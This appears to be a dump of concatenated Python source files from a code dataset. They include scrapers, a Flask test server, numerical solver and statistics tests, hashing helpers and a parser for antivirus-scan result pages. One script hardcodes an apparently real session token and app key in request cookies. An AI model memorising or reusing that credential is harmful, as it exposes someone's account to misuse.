cls.__name__,\n category,\n url,\n url,\n key,\n stock,\n price,\n price,\n 'CLP',\n sku=sku,\n picture_urls=picture_urls,\n part_number=sku\n )\n return [p]\n","sub_path":"storescraper/stores/games_legends.py","file_name":"games_legends.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45066828","text":"\"\"\"\nreference: fluent python p.121\n\"\"\"\n\nimport unicodedata\n\n\ndef shave_marks(txt):\n # Decompose all characters into base characters and combining marks.\n norm_txt = unicodedata.normalize('NFD', txt)\n\n # Filter out all combining marks\n shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))\n\n # Recompose all characters\n return unicodedata.normalize('NFC', shaved)\n\n\norder = '“Herr Voß: • 1⁄2 cup of ŒtkerTM caffè latte • bowl of açaí.”'\nprint(shave_marks(order)) # '“Herr Voß: • 1⁄2 cup of ŒtkerTM caffe latte • bowl of acai.”'\n\nGreek = 'Ζέφυρος, Zéfiro'\nprint(shave_marks(Greek)) # 'Ζεφυρος, Zefiro'\n","sub_path":"src/fluent_python/data_structure/text_vs_byte/normalize/normalize_06_diacritics_01_remove_all.py","file_name":"normalize_06_diacritics_01_remove_all.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"345815957","text":"import logging\nimport threading\nimport time\n\nimport requests\nfrom flask import Flask, request, Response\n\nfrom pyctuator.pyctuator import Pyctuator\nfrom tests.conftest import PyctuatorServer\n\n\nclass FlaskPyctuatorServer(PyctuatorServer):\n def __init__(self) -> None:\n self.app = Flask(\"Flask Example Server\")\n self.thread = threading.Thread(target=self.app.run)\n\n self.pyctuator = Pyctuator(\n self.app,\n \"Flask Pyctuator\",\n \"http://localhost:5000\",\n \"http://localhost:5000/pyctuator\",\n \"http://localhost:8001/register\",\n registration_interval_sec=1\n )\n\n @self.app.route(\"/shutdown\", methods=[\"POST\"])\n # pylint: disable=unused-variable\n def shutdown() -> str:\n logging.info(\"Flask server shutting down...\")\n func = request.environ.get(\"werkzeug.server.shutdown\")\n if func is None:\n raise RuntimeError(\"Not running with the Werkzeug Server\")\n func()\n return \"Flask server off\"\n\n @self.app.route(\"/logfile_test_repeater\")\n # pylint: disable=unused-variable\n def logfile_test_repeater() -> str:\n repeated_string: str = str(request.args.get(\"repeated_string\"))\n logging.error(repeated_string)\n return repeated_string\n\n @self.app.route(\"/httptrace_test_url\", methods=[\"GET\"])\n # pylint: disable=unused-variable\n def get_httptrace_test_url() -> Response:\n # Sleep if requested to sleep - used for asserting httptraces timing\n sleep_sec = request.args.get(\"sleep_sec\")\n if sleep_sec:\n logging.info(\"Sleeping %s seconds before replying\", sleep_sec)\n time.sleep(int(sleep_sec))\n\n # Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly\n resp = Response()\n resp.headers[\"resp-data\"] = str(request.headers.get(\"User-Data\"))\n return resp\n\n def start(self) -> None:\n logging.info(\"Starting Flask server\")\n self.thread.start()\n while True:\n time.sleep(0.5)\n try:\n requests.get(\"http://localhost:5000/pyctuator\")\n logging.info(\"Flask server started\")\n return\n except requests.exceptions.RequestException: # Catches all exceptions that Requests raises!\n pass\n\n def stop(self) -> None:\n logging.info(\"Stopping Flask server\")\n self.pyctuator.stop()\n requests.post(\"http://localhost:5000/shutdown\")\n self.thread.join()\n logging.info(\"Flask server is shutdown\")\n","sub_path":"tests/flask_test_server.py","file_name":"flask_test_server.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"571375240","text":"from musicloud.core.management.commands import FreezeQueryCommand\n\nfrom music21 import converter\nfrom music21.base import Music21ObjectException\nfrom pymuco import rhythm\n\nimport csv, chardet, os, pickle\n\nclass Command(FreezeQueryCommand):\n\n help = 'Query the database and store the result as a pickled dictionary'\n\n def add_arguments(self, parser):\n \n super(Command, self).add_arguments(parser)\n\n parser.add_argument('-r', '--resolution', default=32, type=int, help='Number of grid positions per whole note duration.')\n\n def make_row(self, item, *, resolution, **options):\n\n humdrum_path = item.annotation_queryset('humdrum-path').all()[0].data\n\n # Load humdrum as M21 score\n try:\n score = converter.parse(humdrum_path)\n except UnicodeDecodeError:\n humdrum_bin = open(humdrum_path, 'rb')\n encoding_info = chardet.detect(humdrum_bin.read())\n\n humdrum_file = open(humdrum_path, encoding=encoding_info['encoding']) \n score = converter.parseData(humdrum_file.read(), format='humdrum')\n\n try:\n grid = rhythm.score_to_grid(score, resolution)\n except ValueError as error:\n print(\"[DataItem:%d] Couldn't represent score on a %d grid.\\n\\tHumdrum path: %s\" % (item.id, resolution, humdrum_path))\n print(error)\n return None\n except Exception as error:\n print(\"[ERROR] [DataItem:%d] An error occured while transforming the grid.\\n\\tHumdrum path: %s\" % (item.id, humdrum_path))\n print(error)\n return None\n\n\n try:\n (meter, phase, string) = rhythm.get_score_meter(score, resolution)\n except Music21ObjectException as error:\n print(\"[DataItem:%d] Skipping rhythm without time signature.\\n\\tHumdrum path: %s\" % (item.id, humdrum_path))\n print(error)\n return None\n except Exception as error:\n print(\"[ERROR] [DataItem:%d] An error occured while transforming the grid.\\n\\tHumdrum path: %s\" % (item.id, humdrum_path))\n print(error)\n return None\n\n row = {\n 'name':item.name,\n 'path':humdrum_path,\n 'properties':dict([(p.type.name, p.value) for p in item.properties.all()]),\n 'grid':grid,\n 'meter':meter,\n 'meter_string':string,\n 'phase':phase,\n }\n\n return row\n\n\n","sub_path":"musicloud/musicloud/core/management/commands/freeze_essen.py","file_name":"freeze_essen.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"427600674","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def isPalindrome(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: bool\r\n \"\"\"\r\n nodes = []\r\n ptr = head\r\n while ptr:\r\n nodes.append(ptr.val)\r\n ptr = ptr.next\r\n reverse = nodes[::-1]\r\n for index, i in enumerate(nodes):\r\n if i != reverse[index]:\r\n return False\r\n return True","sub_path":"leetcode/234. Palindrome Linked List/234._Palindrome_Linked_List_2.py","file_name":"234._Palindrome_Linked_List_2.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"75560001","text":"from django.db import models\nfrom profiles.models import Profile\n\n# Create your models here.\nclass Review(models.Model):\n RATINGS=(('0', '0'),\n ('0.5', '0.5'),\n ('1.0', '1.0'),\n ('1.5', '1.5'),\n ('2.0', '2.0'),\n ('2.5', '2.5'),\n ('3.0', '3.0'),\n ('3.5', '3.5'),\n ('4.0', '4.0'),\n ('4.5', '4.5'),\n ('5.0', '5.0'))\n body = models.TextField(max_length=500, blank=True)\n reviewer = models.ForeignKey(Profile, related_name='reviewer', on_delete=models.CASCADE)\n reviewed = models.ForeignKey(Profile, related_name='reviewed', on_delete=models.CASCADE)\n ratings = models.CharField(max_length=3, blank=False, choices=RATINGS)\n date=models.DateTimeField('date posted')","sub_path":"wsgi/static/wsgi/static/review/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"366759570","text":"# -*- coding: utf-8 -*-\nfrom django.db.models import Avg\nfrom django.db.models.functions import Coalesce\n\nfrom companies.models.company import Company\nfrom companies.models.company_internship_review import CompanyInternshipReview\n\n\nclass CompaniesDataRepository(object):\n\n def get_company_by_id(self, company_id):\n try:\n return Company.objects.get(pk=company_id)\n except Company.DoesNotExist:\n pass\n\n def get_companies_list(self):\n return Company.objects.order_by('name').all()\n\n def get_companies_with_average_ratings_data(self, city=None, faculty=None):\n companies = Company.objects.values('name', 'id', 'logo_image').annotate(\n recommendations_score=Coalesce(Avg('companyinternshipreview__recommendation'), 0.0)\n ).annotate(\n apply_skills_score=Coalesce(Avg('companyinternshipreview__apply_skills'), 0.0)\n ).annotate(\n learn_new_score=Coalesce(Avg('companyinternshipreview__learn_new'), 0.0)\n ).order_by('-recommendations_score', '-apply_skills_score', '-learn_new_score')\n\n if city:\n companies = companies.filter(cities__name=city)\n\n if faculty:\n companies = companies.filter(companyinternshipreview__user__student__faculty__name=faculty)\n\n return companies\n\n def find_companies_which_names_start_with(self, query=None):\n companies = self.get_companies_list()\n if query:\n companies = companies.filter(name__istartswith=query)\n return companies\n\n def get_company_by_name(self, company_name):\n try:\n return Company.objects.get(name=company_name)\n except Company.DoesNotExist:\n pass\n\n def add_company(self, company_name, city):\n company = Company()\n company.name = company_name\n company.save()\n company.cities.add(city)\n return company\n\n def add_company_office(self, company, city):\n company.cities.add(city)\n company.save()\n\n def get_company_internships_reviews(self, company):\n return CompanyInternshipReview.objects.filter(company=company)\n\n def get_companies_average_ratings(self, companies_ids=None):\n if not companies_ids:\n return None\n\n return CompanyInternshipReview.objects.values('company').filter(\n company__id__in=set(companies_ids)\n ).annotate(\n recommendations_score=Avg('recommendation')\n ).annotate(\n apply_skills_score=Avg('apply_skills')\n ).annotate(\n learn_new_score=Avg('learn_new')\n )\n\n def get_company_average_rating(self, company_id):\n if not company_id:\n return None\n\n return CompanyInternshipReview.objects.values('company').filter(\n company__id=company_id\n ).annotate(\n recommendations_score=Avg('recommendation')\n ).annotate(\n apply_skills_score=Avg('apply_skills')\n ).annotate(\n learn_new_score=Avg('learn_new')\n )","sub_path":"src/companies/repositories/companies_data_repository.py","file_name":"companies_data_repository.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"450577582","text":"## Importing the Kratos Library\nimport KratosMultiphysics\nimport KratosMultiphysics.mpi as KratosMPI\n\n# Import applications\nimport KratosMultiphysics.TrilinosApplication as TrilinosApplication\nfrom KratosMultiphysics.TrilinosApplication import trilinos_linear_solver_factory\nfrom KratosMultiphysics.FluidDynamicsApplication.adjoint_vmsmonolithic_solver import AdjointVMSMonolithicSolver\n\nfrom KratosMultiphysics.mpi.distributed_import_model_part_utility import DistributedImportModelPartUtility\n\ndef CreateSolver(main_model_part, custom_settings):\n return AdjointVMSMonolithicMPISolver(main_model_part, custom_settings)\n\nclass AdjointVMSMonolithicMPISolver(AdjointVMSMonolithicSolver):\n\n @classmethod\n def GetDefaultParameters(cls):\n # default settings string in json format\n default_settings = KratosMultiphysics.Parameters(\"\"\"\n {\n \"solver_type\": \"trilinos_adjoint_vmsmonolithic_solver\",\n \"scheme_settings\" : {\n \"scheme_type\": \"bossak\"\n },\n \"response_function_settings\" : {\n \"response_type\" : \"drag\"\n },\n \"sensitivity_settings\" : {},\n \"model_import_settings\": {\n \"input_type\": \"mdpa\",\n \"input_filename\": \"unknown_name\"\n },\n \"material_import_settings\": {\n \"materials_filename\": \"\"\n },\n \"linear_solver_settings\" : {\n \"solver_type\" : \"amgcl\"\n },\n \"volume_model_part_name\" : \"volume_model_part\",\n \"skin_parts\": [\"\"],\n \"dynamic_tau\": 0.0,\n \"oss_switch\": 0,\n \"echo_level\": 0,\n \"time_stepping\" : {\n \"automatic_time_step\" : false,\n \"time_step\" : -0.1\n },\n \"domain_size\": -1,\n \"model_part_name\": \"\",\n \"time_stepping\": {\n \"automatic_time_step\" : false,\n \"time_step\" : -0.1\n },\n \"consider_periodic_conditions\": false,\n \"assign_neighbour_elements_to_conditions\": true\n }\"\"\")\n\n default_settings.AddMissingParameters(super(AdjointVMSMonolithicMPISolver, cls).GetDefaultParameters())\n return default_settings\n\n def __init__(self, model, custom_settings):\n self._validate_settings_in_baseclass=True # To be removed eventually\n super(AdjointVMSMonolithicSolver, self).__init__(model, custom_settings)\n\n self.element_name = \"VMSAdjointElement\"\n if self.settings[\"domain_size\"].GetInt() == 2:\n self.condition_name = \"LineCondition\"\n elif self.settings[\"domain_size\"].GetInt() == 3:\n self.condition_name = \"SurfaceCondition\"\n self.min_buffer_size = 2\n self.element_has_nodal_properties = True\n\n self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.OSS_SWITCH, self.settings[\"oss_switch\"].GetInt())\n self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.DYNAMIC_TAU, self.settings[\"dynamic_tau\"].GetDouble())\n\n KratosMultiphysics.Logger.PrintInfo(self.__class__.__name__, \"Construction of AdjointVMSMonolithicMPISolver finished.\")\n\n def AddVariables(self):\n ## Add variables from the base class\n super(self.__class__, self).AddVariables()\n\n ## Add specific MPI variables\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.PARTITION_INDEX)\n\n KratosMultiphysics.Logger.PrintInfo(self.__class__.__name__, \"Variables for the AdjointVMSMonolithicMPISolver added correctly in each processor.\")\n\n def ImportModelPart(self):\n ## Construct the distributed import model part utility\n self.distributed_model_part_importer = DistributedImportModelPartUtility(self.main_model_part, self.settings)\n ## Execute the Metis partitioning and reading\n self.distributed_model_part_importer.ExecutePartitioningAndReading()\n\n KratosMultiphysics.Logger.PrintInfo(self.__class__.__name__, \"MPI model reading finished.\")\n\n def PrepareModelPart(self):\n super(self.__class__,self).PrepareModelPart()\n ## Construct the MPI communicators\n self.distributed_model_part_importer.CreateCommunicators()\n\n def _GetEpetraCommunicator(self):\n if not hasattr(self, '_epetra_communicator'):\n self._epetra_communicator = TrilinosApplication.CreateCommunicator()\n return self._epetra_communicator\n\n def _CreateScheme(self):\n response_function = self.GetResponseFunction()\n scheme_type = self.settings[\"scheme_settings\"][\"scheme_type\"].GetString()\n if scheme_type == \"bossak\":\n scheme = TrilinosApplication.TrilinosResidualBasedAdjointBossakScheme(\n self.settings[\"scheme_settings\"],\n response_function)\n elif scheme_type == \"steady\":\n scheme = TrilinosApplication.TrilinosResidualBasedAdjointSteadyScheme(response_function)\n else:\n raise Exception(\"Invalid scheme_type: \" + scheme_type)\n return scheme\n\n def _CreateLinearSolver(self):\n linear_solver_configuration = self.settings[\"linear_solver_settings\"]\n return trilinos_linear_solver_factory.ConstructSolver(linear_solver_configuration)\n\n def _CreateBuilderAndSolver(self):\n # Set the guess_row_size (guess about the number of zero entries) for the Trilinos builder and solver\n domain_size = self.GetComputingModelPart().ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n if domain_size == 3:\n guess_row_size = 20*4\n else:\n guess_row_size = 10*3\n # Construct the Trilinos builder and solver\n trilinos_linear_solver = self._GetLinearSolver()\n epetra_communicator = self._GetEpetraCommunicator()\n if self.settings[\"consider_periodic_conditions\"].GetBool():\n builder_and_solver = TrilinosApplication.TrilinosBlockBuilderAndSolverPeriodic(\n epetra_communicator,\n guess_row_size,\n trilinos_linear_solver,\n KratosFluid.PATCH_INDEX)\n else:\n builder_and_solver = TrilinosApplication.TrilinosBlockBuilderAndSolver(\n epetra_communicator,\n guess_row_size,\n trilinos_linear_solver)\n return builder_and_solver\n\n def _CreateSolutionStrategy(self):\n computing_model_part = self.GetComputingModelPart()\n time_scheme = self._GetScheme()\n linear_solver = self._GetLinearSolver()\n builder_and_solver = self._GetBuilderAndSolver()\n calculate_reaction_flag = False\n reform_dof_set_at_each_step = False\n calculate_norm_dx_flag = False\n move_mesh_flag = False\n return TrilinosApplication.TrilinosLinearStrategy(\n computing_model_part,\n time_scheme,\n linear_solver,\n builder_and_solver,\n calculate_reaction_flag,\n reform_dof_set_at_each_step,\n calculate_norm_dx_flag,\n move_mesh_flag)\n","sub_path":"applications/FluidDynamicsApplication/python_scripts/trilinos_adjoint_vmsmonolithic_solver.py","file_name":"trilinos_adjoint_vmsmonolithic_solver.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"354327432","text":"# -*- coding: utf-8 -*-\n\n# (c) 2017-2019, ETH Zurich, Institut fuer Theoretische Physik\n# Author: Dominik Gresch \n\"\"\"\nHelper functions for serializing objects to HDF5.\n\"\"\"\n\n\ndef nested_list_from_hdf5(hdf5_handle):\n res = []\n for idx in sorted(hdf5_handle, key=int):\n res.append(list(hdf5_handle[idx][()]))\n return res\n\n\ndef dict_from_hdf5(hdf5_handle):\n res = dict()\n for key in hdf5_handle:\n res[key] = hdf5_handle[key][()]\n return res\n","sub_path":"bands_inspect/io/_legacy/_hdf5_utils.py","file_name":"_hdf5_utils.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"104534234","text":"from cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\n\n\nasync def hash_SHA512(data):\n digest = hashes.Hash(hashes.SHA512(), backend=default_backend())\n digest.update(str.encode(data))\n return digest.finalize().hex()\n\n\nasync def hash_SHA256(data):\n digest = hashes.Hash(hashes.SHA256(), backend=default_backend())\n digest.update(str.encode(data))\n return digest.finalize().hex()\n\n\nasync def create_uuid(data):\n return await hash_SHA256(data)","sub_path":"app/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"596894970","text":"\"\"\"\nTests for lss.py\n\n\"\"\"\nimport sys\nimport unittest\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom quantecon.lss import LinearStateSpace\nfrom nose.tools import raises\n\n\nclass TestLinearStateSpace(unittest.TestCase):\n\n def setUp(self):\n # Example 1\n A = .95\n C = .05\n G = 1.\n mu_0 = .75\n\n self.ss1 = LinearStateSpace(A, C, G, mu_0=mu_0)\n\n # Example 2\n ρ1 = 0.5\n ρ2 = 0.3\n α = 0.5\n\n A = np.array([[ρ1, ρ2, α], [1, 0, 0], [0, 0, 1]])\n C = np.array([[1], [0], [0]])\n G = np.array([[1, 0, 0]])\n mu_0 = [0.5, 0.5, 1]\n\n self.ss2 = LinearStateSpace(A, C, G, mu_0=mu_0)\n\n def tearDown(self):\n del self.ss1\n del self.ss2\n\n def test_stationarity(self):\n vals = self.ss1.stationary_distributions()\n ssmux, ssmuy, sssigx, sssigy, sssigyx = vals\n\n self.assertTrue(abs(ssmux - ssmuy) < 2e-8)\n self.assertTrue(abs(sssigx - sssigy) < 2e-8)\n self.assertTrue(abs(ssmux) < 2e-8)\n self.assertTrue(abs(sssigx - self.ss1.C**2/(1 - self.ss1.A**2)) < 2e-8)\n self.assertTrue(abs(sssigyx - self.ss1.G @ sssigx) < 2e-8)\n\n vals = self.ss2.stationary_distributions()\n ssmux, ssmuy, sssigx, sssigy, sssigyx = vals\n\n assert_allclose(ssmux.flatten(), np.array([2.5, 2.5, 1]))\n assert_allclose(ssmuy.flatten(), np.array([2.5]))\n assert_allclose(\n sssigx,\n self.ss2.A @ sssigx @ self.ss2.A.T + self.ss2.C @ self.ss2.C.T\n )\n assert_allclose(sssigy, self.ss2.G @ sssigx @ self.ss2.G.T)\n assert_allclose(sssigyx, self.ss2.G @ sssigx)\n\n def test_simulate(self):\n ss = self.ss1\n\n sim = ss.simulate(ts_length=250)\n for arr in sim:\n self.assertTrue(len(arr[0]) == 250)\n\n def test_simulate_with_seed(self):\n ss = self.ss1\n\n xval, yval = ss.simulate(ts_length=5, random_state=5)\n expected_output = np.array([0.75, 0.69595649, 0.78269723, 0.73095776,\n 0.69989036])\n\n assert_allclose(xval[0], expected_output)\n assert_allclose(yval[0], expected_output)\n\n def test_replicate(self):\n xval, yval = self.ss1.replicate(T=100, num_reps=5000)\n\n assert_allclose(xval, yval)\n self.assertEqual(xval.size, 5000)\n self.assertLessEqual(abs(np.mean(xval)), .05)\n\n def test_replicate_with_seed(self):\n xval, yval = self.ss1.replicate(T=100, num_reps=5, random_state=5)\n expected_output = np.array([0.10498898, 0.02892168, 0.04915998,\n 0.18568489, 0.04541764])\n\n assert_allclose(xval[0], expected_output)\n assert_allclose(yval[0], expected_output)\n\n\n@raises(ValueError)\ndef test_non_square_A():\n A = np.zeros((1, 2))\n C = np.zeros((1, 1))\n G = np.zeros((1, 1))\n\n LinearStateSpace(A, C, G)\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestLinearStateSpace)\n unittest.TextTestRunner(verbosity=2, stream=sys.stderr).run(suite)\n","sub_path":"quantecon/tests/test_lss.py","file_name":"test_lss.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378369586","text":"doc = open('romeo.txt','r')\nlines = doc.readlines()\ngeneral_list = []\ndef fun_split(data):\n line = data.split(' ')\n for word in line:\n for i in general_list:\n if word != i:\n general_list.append(word)\n\n return line\n\nfor line in lines:\n fun_split(line)\n\n# def split_func(data):\n# new_data =data.split(' ')\n\n","sub_path":"src/chapter 8/exercise 4.py","file_name":"exercise 4.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"450299775","text":"from .htmlparser import tree\nfrom .htmlparser.lex import LexHtml\nfrom .htmlparser.yacc import YaccHtml\nfrom ..exceptions import HtmlParserException\nimport logging\nimport re\n\n\ndef parse(html, sha256):\n lexer = LexHtml()\n parser = YaccHtml()\n result = parser.build(data=html, lexer=lexer)\n ret = _get_simple_info(result, sha256)\n ret['Analysis'] = _get_antivirus_result(result, sha256)\n ret.update(_get_detail_content(result, sha256))\n ret.update(_get_additional_info(result, sha256))\n return ret\n\n\ndef process_safe_log(func):\n def f(results, sha256):\n try:\n return func(results, sha256)\n except:\n logging.warning(\"Problems with SHA256 \" + sha256 +\n \". If something is missing, please report it by Github Issues.\")\n return dict()\n # def no(results, sha256):\n # return func(results, sha256)\n return f\n\n\ndef _get_tag(dom, tags):\n d = dom.html.content\n\n for tag in tags:\n content = d.get_elements()\n found = False\n for i in content:\n if i.get_name() == tag[0]:\n params = i.get_params()\n if tag[1]:\n for param in params:\n if param == tag[1]:\n found = True\n break\n else:\n found = True\n if found:\n d = i.content\n break\n else:\n raise HtmlParserException('Cannot find ' + str(tag))\n return d\n\n\n@process_safe_log\ndef _get_antivirus_result(dom, sha256):\n antivirus_results = [\n ('body', None),\n ('div', ('class', 'wrapper')),\n ('div', ('class', 'container')),\n ('div', ('class', 'tab-content')),\n ('div', ('class', 'tab-pane active')),\n ('div', ('id', 'results')),\n ('div', ('id', 'active-tab')),\n ('table', ('id', 'antivirus-results'))\n ]\n result = []\n try:\n table = _get_tag(dom, antivirus_results).get_elements()\n names = []\n for header in table[0].get_content():\n for col in header.get_content():\n names.append(col.get_content()[0].strip())\n for i in table[1].get_content():\n antivirus = dict()\n for ind, j in enumerate(i.get_content()):\n elem = j.get_content()[0]\n if isinstance(elem, tree.HtmlTag):\n antivirus[names[ind]] = '-'\n else:\n antivirus[names[ind]] = elem.strip()\n result.append(antivirus)\n except HtmlParserException as e:\n logging.debug('Cannot scrap antivirus results (' + str(e) + ')')\n return result\n\n\n@process_safe_log\ndef _get_detail_content(dom, sha256):\n tags = [\n ('body', None),\n ('div', ('class', 'wrapper')),\n ('div', ('class', 'container')),\n ('div', ('class', 'tab-content')),\n ('div', ('id', 'item-detail')),\n ('div', ('id', 'item-detail-content')),\n ('div', ('id', 'file-details'))\n ]\n result = dict()\n try:\n html_list = _get_tag(dom, tags).get_elements()\n while html_list[0].get_name() != 'h5':\n html_list.pop(0)\n\n part_name = None\n\n for i in html_list:\n if i.get_name() == 'h5':\n part_name = i.get_content()[1]\n result[part_name] = dict()\n else:\n if i.get_params()[0] == ('class', 'enum-container'):\n elems = i.get_content()\n if elems[0].get_params()[0] == ('class', 'enum'):\n for elem in elems:\n try:\n tmp1 = elem.get_content()\n key = tmp1[0].get_content()\n value = tmp1[1] if len(tmp1) > 1 else \"\"\n if isinstance(value, tree.HtmlTag):\n value = value.get_content()[0]\n key = key[0].replace('\\n', ' ').strip()\n value = value.replace('\\n', ' ').strip()\n result[part_name][key] = value\n except Exception:\n pass # There is a problem with key or value, probably null.\n if elems[0].get_params()[0] == ('class', 'expand-canvas'):\n for elem in elems:\n line = elem.get_content()\n key = line[0].get_content()[0].get_content()[0].replace('[+] ', '')\n value = []\n for v in line[1].get_content():\n value.append(v.get_content()[0])\n result[part_name][key] = value\n if i.get_params()[0] == ('class', 'expandable'):\n elems = i.get_content()\n value = []\n for elem in elems:\n if elem.get_name() == 'div':\n value.append(elem.get_content()[0])\n result[part_name] = value\n if i.get_params()[0] == ('class', 'enum-container expandable'):\n elems = i.get_content()\n names = list()\n part_result = list()\n for column in elems[0].get_content():\n names.append(column.get_content()[0])\n for line in elems[1:]:\n try:\n part = dict()\n for ind, column in enumerate(line.get_content()):\n if column.get_name() == 'div':\n extended_dict = dict()\n for ex in column.get_content():\n key = ex.get_content()[0].get_content()[0]\n value = ex.get_content()[1].strip()\n extended_dict[key] = value\n part[\"Extended\"] = extended_dict\n else:\n elem = column.get_content()\n elem = elem[0] if len(elem) > 0 else '-'\n if isinstance(elem, tree.HtmlTag):\n elem = elem.get_content()[0]\n if isinstance(elem, tree.HtmlTag):\n continue\n part[names[ind]] = elem.strip()\n part_result.append(part)\n except AttributeError:\n pass\n result[part_name] = part_result\n except HtmlParserException as e:\n logging.debug('Cannot scrap detail content (' + str(e) + ')')\n\n return result\n\n\n@process_safe_log\ndef _get_additional_info(dom, sha256):\n tags = [\n ('body', None),\n ('div', ('class', 'wrapper')),\n ('div', ('class', 'container')),\n ('div', ('class', 'tab-content')),\n ('div', ('id', 'additional-info')),\n ('div', ('id', 'additional-info-content')),\n ('div', ('id', 'file-details'))\n ]\n\n result = dict()\n try:\n html_list = _get_tag(dom, tags).get_elements()\n for elem in html_list:\n if elem.get_name() == 'h5':\n part_name = elem.get_content()[1]\n result[part_name] = dict()\n else:\n for i in elem.get_content():\n try:\n t = i.get_content()\n if t[0].get_name() == 'span':\n key = t[0].get_content()[0].strip()\n value = t[1]\n while isinstance(value, tree.HtmlTag):\n value = value.get_content()[0]\n result[part_name][key] = re.sub(r\"\\s+\", ' ', value)\n if t[0].get_name() == 'div':\n key = t[0].get_content()[0].strip()\n value = t[1].get_content()[0]\n if isinstance(value, tree.HtmlTag):\n tmp = t[1].get_content()\n value = []\n for nested in tmp:\n value.append(re.sub(r\"\\s+\", ' ', nested.get_content()[0]))\n else:\n value = re.sub(r\"\\s+\", ' ', value)\n result[part_name][key] = value\n if t[0].get_name() == 'table':\n rows = t[0].get_content()[0].get_content()\n key = rows[0].get_content()[0]\n value = []\n for elem in rows[1].get_content():\n if isinstance(elem, str):\n value.append(elem)\n result[part_name][key] = value\n except Exception:\n # Some problems with values\n pass\n\n except HtmlParserException as e:\n logging.debug('Cannot scrap additional info + (' + str(e) + ')')\n\n return result\n\n\n@process_safe_log\ndef _get_simple_info(dom, sha256):\n tags = [\n ('body', None),\n ('div', ('class', 'wrapper')),\n ('div', ('class', 'container')),\n ('div', ('class', 'frame')),\n ('div', ('id', 'basic-info')),\n ('div', ('class', 'row')),\n ('div', ('class', 'span8 columns')),\n ('table', None),\n ('tbody', None)\n ]\n result = dict()\n try:\n html_list = _get_tag(dom, tags).get_elements()\n for row in html_list:\n elem = row\n key = elem.get_content()[0].get_content()[0][:-1]\n value = re.sub(r\"\\s+\", ' ', elem.get_content()[1].get_content()[0])\n result[key] = value\n\n except HtmlParserException as e:\n logging.debug('Cannot scrap basic info (' + str(e) + ')')\n\n return result\n","sub_path":"src/scrapper/parsers/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":10309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"501952088","text":"import requests\nimport json\nimport datetime\n\nif __name__ == '__main__':\n pay_load = '''{\"pageSize\":100,\"newTemplateInstanceId\":\"5da3ce37c0a38a3cfcfd6d27\",\"oldTemplateInstanceId\":null,\"type\":\"next\",\"isDraftId\":false}'''\n resp = requests.post('https://www.yunzhijia.com/workreport/rest/v1/personal/reports',\n cookies = {\"webLappToken\": \"RTXcirUwxXcUaI%2B4Yz71zl2OZ1%2BmGbP6GP%2BHFg7QJ1Mp5JoXqpGLlzJqoSSEG4ILrKKbkg%2BGU4hF0GROw8%2BJtMEtbznAiE2XhQXey1tZjrOYMHuAZ79dJrUnu4TQNqNE\"\n ,\"lappKey\": \"lightapp_5c1a1c0d1248c3a55d1b6036590b0b59\"\n },\n data=pay_load,\n )\n result_json = json.loads(resp.text)\n infos = []\n for report in result_json['data']['reports']:\n widgetMap = report['formVo']['widgetMap']\n report_type = widgetMap['_S_TITLE']['value']\n report_head = ''\n report_date = datetime.datetime.utcfromtimestamp(widgetMap['_S_REPORT_TIME']['value']/1000)\n dt = datetime.datetime.utcfromtimestamp(widgetMap['_S_DATE']['value']/1000)\n if 'Te_1' in widgetMap:\n report_head = widgetMap['Te_1']['value']\n else:\n report_head = widgetMap['Te_0']['value']\n infos.append((report_type, report_head, report_date, dt))\n\n for report_type, report_head, report_date, dt in infos:\n print(report_type, report_head, report_date.strftime('%Y-%m-%d'), dt.strftime('%Y-%m-%d'), sep='\\t')\n\n # print(infos)","sub_path":"xl/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476188283","text":"import os\n\nfrom molseqcollection_class import MolSeqCollection\nimport metacats_parser\nfrom count_sites_in_window import count_targets_in_sliding_windows_filter_by_threshold\nfrom count_sites_in_window import merge_contiguous_windows\nfrom plot_bar_graph import 